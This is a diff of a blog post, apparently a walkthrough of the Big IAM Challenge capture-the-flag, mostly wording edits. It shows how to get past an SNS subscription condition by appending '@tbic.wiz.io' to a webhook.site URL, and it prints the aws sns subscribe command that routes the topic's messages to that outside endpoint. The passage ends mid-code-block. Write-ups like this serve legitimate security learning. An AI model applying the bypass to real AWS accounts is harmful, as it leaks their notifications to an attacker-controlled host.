hatedabamboo/notes.hatedabamboo.me/docs/posts/solving-the-big-iam-challenge.md

 And now we wait.

 Wait, what?
 Wait for what?
 How do I confirm the subscription to the topic if I have no access to the email?
-Looks like I fell in the easiest trap!
+Looks like I fell into the easiest trap!

-Okay, let's think.
-Since we have no access to email, we have to figure out a different way to receive a message from the topic.
+Okay, let’s think.
+Since we don’t have access to email, we need to figure out another way to receive a message from the topic.
 How can we do that?
 What are the options to receive messages from SNS?
-We're able to use the following protocols to communicate with SNS: http, https, email, email-json, sms, sqs, application, lambda and firehose.
+We can use the following protocols to communicate with SNS: HTTP, HTTPS, email, email-json, SMS, SQS, application, Lambda, and Firehose.
 What if we set up an HTTP endpoint to receive messages?
 Webhooks, here we go!
-Luckily there are [services](https://webhook.site) online that allow one to test webhook requests.
-The trick here is to take the unique webhook URL and add the required endpoint string to the end of the URL: `https://webhook.site/3bddcb48-f58d-4284-a731-491c8784e0b1@tbic.wiz.io`.
+Luckily, there are [services](https://webhook.site) online that allow us to test webhook requests.
+The trick here is to take the unique webhook URL and add the required endpoint string to the end of the URL: `https://webhook.site/3bddcb48-f58d-4284-a731-491c8784e0b1/@tbic.wiz.io`.
 Still a valid URL?
-Let's find out!
+Let’s find out!

 ```shell
 > aws sns subscribe --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --protocol https --notification-endpoint https://webhook.site/3bddcb48-f58d-4284-a731-491c8784e0b1/@tbic.wiz.io